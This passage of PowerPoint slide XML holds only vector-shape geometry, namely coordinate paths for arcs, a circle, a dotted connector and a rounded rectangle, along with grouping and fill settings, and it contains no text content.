                    <a:pt x="1278944" y="562906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1298015" y="602849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313220" y="644610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1324344" y="687986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1331175" y="732772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1333500" y="778763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1652016" y="778763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1650508" y="731410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1646043" y="684795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638707" y="639001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1628587" y="594110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615768" y="550204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1600337" y="507366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1582382" y="465678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1561987" y="425222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1539239" y="386080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514226" y="348334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1487033" y="312067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1457746" y="277361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1426453" y="244298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393239" y="212961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1358191" y="183431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1321395" y="155792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282938" y="130124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1242906" y="106510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1201386" y="85033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158463" y="65775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114225" y="48818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068758" y="34244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022148" y="22135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="974481" y="12574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925845" y="5643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876325" y="1424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826007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1684508" y="3246119"/>
              <a:ext cx="1064260" cy="996950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1064259" h="996950">
                  <a:moveTo>
                    <a:pt x="531876" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="483463" y="2036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436269" y="8029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390480" y="17802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346285" y="31180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303871" y="47985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263426" y="68043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225137" y="91177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189193" y="117212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155781" y="145970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125089" y="177277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97304" y="210956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72615" y="246831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51209" y="284727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33275" y="324466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18998" y="365874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8569" y="408774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2173" y="452991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="498347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2173" y="543704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8569" y="587921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18998" y="630821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33275" y="672229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51209" y="711968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72615" y="749864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97304" y="785739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125089" y="819418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155781" y="850725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189193" y="879483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225137" y="905518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263426" y="928652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303871" y="948710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346285" y="965515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390480" y="978893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436269" y="988666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483463" y="994659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531876" y="996695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580288" y="994659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627482" y="988666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673271" y="978893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717466" y="965515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759880" y="948710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800325" y="928652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838614" y="905518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874558" y="879483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907970" y="850725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938662" y="819418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966447" y="785739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991136" y="749864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012542" y="711968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030476" y="672229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044753" y="630821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055182" y="587921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061578" y="543704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063752" y="498347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061578" y="452991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055182" y="408774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044753" y="365874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1030476" y="324466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012542" y="284727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991136" y="246831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966447" y="210956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938662" y="177277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907970" y="145970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874558" y="117212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838614" y="91177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800325" y="68043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759880" y="47985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717466" y="31180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673271" y="17802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627482" y="8029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580288" y="2036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531876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91416" y="3628644"/>
              <a:ext cx="251459" cy="233171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916938" y="4422647"/>
            <a:ext cx="4089400" cy="3886835"/>
            <a:chOff x="1916938" y="4422647"/>
            <a:chExt cx="4089400" cy="3886835"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3919727" y="4422647"/>
              <a:ext cx="83820" cy="890269"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="83820" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="3147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="11652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="24110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="39115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="54929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="67802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="76459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="79628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="76459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="67802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="54929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="39115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="24110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="11652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="3147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="115824"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="118993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="127650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="140523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="156337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="171342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="183800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="192305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="195452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="192305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="183800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="171342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="156337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="140523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="127650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="118993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="115824"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="231521"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="234692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="243363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="256274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="272161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="287093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="299513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="308004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="311150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="308004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="299513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="287093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="272161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="256274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="243363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="234692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="231521"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="347344"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="350514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="359171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="372044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="387857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="402863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="415321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="423826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="426974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="423826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="415321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="402863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="387857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="372044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="359171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="350514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="347344"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="464565"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="467498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="475646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="488033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="503681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="518614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="531034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="539525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="542671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="539525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="531034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="518614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="503681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="488033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="475646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="467498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="464565"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="580263"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="583213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="591391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="603783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="619378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="634384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="646842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="655347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="658494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="655347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="646842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="634384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="619378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="603783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="591391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="583213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="580263"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="696087"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="699019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="707167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="719554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="735202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="750135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="762555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="771046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="771046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="762555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="750135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="735202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="719554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="707167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="699019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="696087"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="83820" h="890270">
                  <a:moveTo>
                    <a:pt x="41148" y="811784"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="814931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="823436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="835894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="850900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="866548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="878935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25342" y="887083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="890015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="887083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="878935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="866548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83820" y="850900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80492" y="835894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71389" y="823436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57834" y="814931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41148" y="811784"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0066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923288" y="5312663"/>
              <a:ext cx="4076700" cy="2990215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4076700" h="2990215">
                  <a:moveTo>
                    <a:pt x="0" y="498348"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2281" y="450357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8986" y="403656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19906" y="358453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34832" y="314959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53555" y="273381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75866" y="233929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101556" y="196812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130416" y="162238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162238" y="130416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196812" y="101556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233929" y="75866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273381" y="53555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314959" y="34832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358453" y="19906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403656" y="8986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450357" y="2281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498348" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3578352" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3626342" y="2281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3673043" y="8986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3718246" y="19906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3761740" y="34832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3803318" y="53555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842770" y="75866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3879887" y="101556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3914461" y="130416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3946283" y="162238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3975143" y="196812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000833" y="233929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4023144" y="273381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4041867" y="314959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4056793" y="358453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4067713" y="403656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4074418" y="450357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4076700" y="498348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4076700" y="2491740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4074418" y="2539732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4067713" y="2586435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4056793" y="2631638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4041867" y="2675133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4023144" y="2716711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000833" y="2756163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3975143" y="2793280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3946283" y="2827854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3914461" y="2859675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3879887" y="2888535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842770" y="2914224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3803318" y="2936534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3761740" y="2955256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3718246" y="2970182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3673043" y="2981101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3626342" y="2987806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3578352" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498348" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450357" y="2987806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403656" y="2981101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358453" y="2970182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314959" y="2955256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273381" y="2936534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233929" y="2914224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196812" y="2888535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162238" y="2859675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130416" y="2827854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101556" y="2793280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75866" y="2756163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53555" y="2716711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34832" y="2675133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19906" y="2631638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8986" y="2586435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2281" y="2539732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2491740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="498348"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="00669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/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6124702" y="4431791"/>
            <a:ext cx="4005579" cy="3877310"/>
            <a:chOff x="6124702" y="4431791"/>
            <a:chExt cx="4005579" cy="3877310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8087868" y="4431791"/>
              <a:ext cx="83820" cy="893444"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="83820" h="893445">
                  <a:moveTo>
                    <a:pt x="41148" y="813308"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25342" y="816455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="824960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3303" y="837418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="852424"/>
